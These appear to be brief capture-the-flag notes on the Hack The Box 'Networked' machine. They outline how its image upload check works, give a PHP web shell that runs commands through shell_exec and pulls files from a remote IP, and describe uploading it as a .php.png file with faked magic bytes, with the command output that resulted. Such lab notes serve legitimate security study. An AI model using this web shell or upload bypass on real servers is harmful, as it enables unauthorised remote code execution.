3 :80 upload.php & lib.php
# file: upload.php
upload dir: /var/www/html/uploads/
POST submit:
check_file_type => Content-Type: image/*
check_file_size => size < 60000
return invalid image - break
if valid image:
name = IP(separated with '_').ext | 10_10_16_7.php.png
move uploaded file to uplaod_dir
chmod 644 file
# file: lib.php
getnameUpload($filename) | k.php.png
pieces = array(split on '.') | [k, php, png]
name = pieces[0] | k
name = replace '_' with '.' | k
ext = join pieces with '.' after the removed 1st element | php.png
return name, ext
# tried the basic shell
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents('http://IP/' . $_REQUEST['fupload']));
};
?>
# can see the file but cannot run commands
# trying the webshell
# added 16 X on top
# hexeditor to change magic bytes
# upload successful >
http://networked.htb/uploads/10_10_16_7.php.png
CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache)
networked.htb
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Last updated